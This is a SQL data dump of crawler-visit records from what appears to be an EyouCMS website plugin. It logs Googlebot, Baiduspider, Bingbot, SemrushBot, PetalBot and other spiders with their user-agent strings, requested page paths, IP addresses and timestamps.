INSERT INTO `ey_weapp_spider_visit` VALUES ('94243', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1660164093', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94244', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/220.html', '116.179.32.87', '1660164524', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94239', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/115.html', '216.244.66.194', '1660161837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94230', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_12/', '114.119.151.155', '1660154088', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94229', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/changjianwenda/list_20_5/', '220.181.108.147', '1660153748', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94224', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/456.html', '114.119.151.153', '1660151735', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98916', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.29', '1662430458', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94222', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wz.html', '114.119.151.153', '1660151554', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98927', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/8_2.html', '185.191.171.9', '1662440662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98928', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/336.html', '40.77.167.9', '1662440806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98930', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_70/', '116.179.32.80', '1662442503', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99087', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/sitemap.xml', '157.55.39.90', '1662485651', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99034', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tuobeng/', '162.55.86.60', '1662457498', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98951', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_34.html', '185.191.171.7', '1662450413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98972', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/60.html', '114.119.151.156', '1662457226', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98978', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/buliaoji/', '162.55.86.60', '1662457247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98982', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/gjxw/', '162.55.86.60', '1662457260', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99011', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/499.html', '162.55.86.60', '1662457360', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99014', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/306.html', '162.55.86.60', '1662457375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99015', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/315.html', '162.55.86.60', '1662457381', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99018', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/328.html', '162.55.86.60', '1662457402', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99022', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/337.html', '162.55.86.60', '1662457432', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99025', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/69.html', '162.55.86.60', '1662457445', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99029', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/82.html', '162.55.86.60', '1662457473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99033', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tbxw/', '162.55.86.60', '1662457491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99117', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/58.html', '162.55.86.60', '1662487584', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99127', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/honor/25.html', '162.55.86.60', '1662487623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99189', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/city/zhongshan.html', '116.179.32.43', '1662494802', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99128', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/130.html', '162.55.86.60', '1662487627', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99133', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/261.html', '162.55.86.60', '1662487653', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99136', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/312.html', '162.55.86.60', '1662487668', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99134', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/262.html', '162.55.86.60', '1662487660', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99135', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/311.html', '162.55.86.60', '1662487664', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99137', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/313.html', '162.55.86.60', '1662487673', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99141', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/445.html', '162.55.86.60', '1662487695', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99142', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/450.html', '162.55.86.60', '1662487700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99143', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/452.html', '162.55.86.60', '1662487704', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99144', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/486.html', '162.55.86.60', '1662487707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99148', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/492.html', '162.55.86.60', '1662487719', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99163', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/tbxw/list_91_2/', '162.55.86.60', '1662487780', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99169', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/72.html', '114.119.151.151', '1662488297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99179', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/495.html', '66.249.79.108', '1662488917', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99186', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/126.html', '116.179.32.75', '1662493713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99190', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/82.html', '185.191.171.17', '1662495155', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99194', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1662497742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99207', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.176', '1662510828', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99212', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/146.html', '220.181.108.177', '1662512792', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94219', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/468.html', '114.119.151.153', '1660150986', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94218', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1660150066', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94220', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sy.html', '114.119.151.153', '1660151252', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94221', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/233.html', '114.119.151.155', '1660151351', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94223', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_16/', '114.119.151.155', '1660151639', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94228', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/94.html', '114.119.151.155', '1660153328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94232', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wfs.html', '114.119.151.155', '1660154387', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94273', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660176308', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94257', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/search.html', '185.191.171.36', '1660170172', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94261', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/101.html', '66.249.79.108', '1660172912', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94262', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/177.html', '66.249.79.110', '1660173131', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94271', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '42.194.242.213', '1660176281', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94270', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/449.html', '216.244.66.194', '1660176157', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94276', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/41.html?tagid=41', '185.191.171.26', '1660176871', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94292', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_29/', '220.181.108.177', '1660185329', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94328', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_24/', '114.119.151.153', '1660207799', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94303', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/196.html', '185.191.171.1', '1660189790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94302', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/339.html', '185.191.171.38', '1660189422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94301', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_9.html', '185.191.171.35', '1660188546', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94326', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.112', '1660206001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94306', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/243.html', '185.191.171.23', '1660191787', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94311', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/163.html', '66.249.79.112', '1660197007', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94312', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/55.html', '185.191.171.39', '1660198905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94313', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/109.html', '185.191.171.1', '1660199340', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94314', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/111.html', '185.191.171.9', '1660199417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94327', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/62.html', '220.181.108.165', '1660207422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94347', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/420.html', '185.191.171.6', '1660217704', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94358', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/42.html', '116.179.32.39', '1660223317', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94360', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/445.html', '185.191.171.7', '1660224687', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94377', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_13.html', '185.191.171.9', '1660241640', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94366', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_13/', '185.191.171.22', '1660231320', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94374', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/10_5.html', '185.191.171.40', '1660240588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94370', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/jbJxw/', '116.179.32.22', '1660236182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94371', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/1_7.html', '66.249.79.110', '1660236188', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94373', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.107', '1660239785', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94379', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1660241867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94383', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.110', '1660246326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94386', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660248414', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94384', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_11.html', '185.191.171.33', '1660246339', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94385', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/jiaruwomen/', '54.161.41.102', '1660247856', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94387', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/212.html', '185.191.171.2', '1660249550', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94392', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.91', '1660256306', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94393', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/221.html', '216.244.66.194', '1660257031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94398', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/197.html', '216.244.66.194', '1660259779', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94429', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660272099', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94464', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sns.html', '114.119.151.153', '1660288658', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94482', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660301556', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94483', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengcheal/', '66.249.79.112', '1660302669', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94484', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/376.html', '185.191.171.44', '1660302773', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94486', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/419.html', '40.77.167.13', '1660303482', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94494', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/194.html', '185.191.171.13', '1660307247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94495', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/hangyexinwen/list_18_22/', '216.244.66.194', '1660308451', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94499', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yb.html', '114.119.151.155', '1660311826', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94503', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/488.html', '114.119.151.153', '1660314460', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94507', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/464.html', '185.191.171.44', '1660316005', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94506', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.108', '1660315962', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94509', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/baoshan.html', '114.119.151.155', '1660318324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94511', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_7.html', '185.191.171.34', '1660318865', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94517', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljwd/list_20_2/', '185.191.171.44', '1660322570', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94521', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1660324096', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94525', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660327836', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94519', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bz.html', '114.119.151.155', '1660323041', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94522', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/8_2.html', '220.181.108.81', '1660325122', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94523', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/116.html', '185.191.171.14', '1660326493', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94524', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/312.html', '185.191.171.11', '1660327527', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94526', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact', '66.249.79.112', '1660328589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94528', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/33.html', '185.191.171.4', '1660329017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94530', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_9/', '185.191.171.44', '1660330248', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94532', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/451.html', '42.236.10.71', '1660332515', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94533', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/36.html', '185.191.171.9', '1660332837', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94535', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/200.html', '185.191.171.10', '1660334074', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94540', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/451.html', '180.163.220.99', '1660339807', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94542', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/77_7.html', '185.191.171.9', '1660342121', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94573', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/290.html', '114.119.151.153', '1660355839', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94574', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/164.html', '114.119.151.155', '1660355998', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94587', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660359086', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94578', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/224.html', '216.244.66.194', '1660356807', '0');
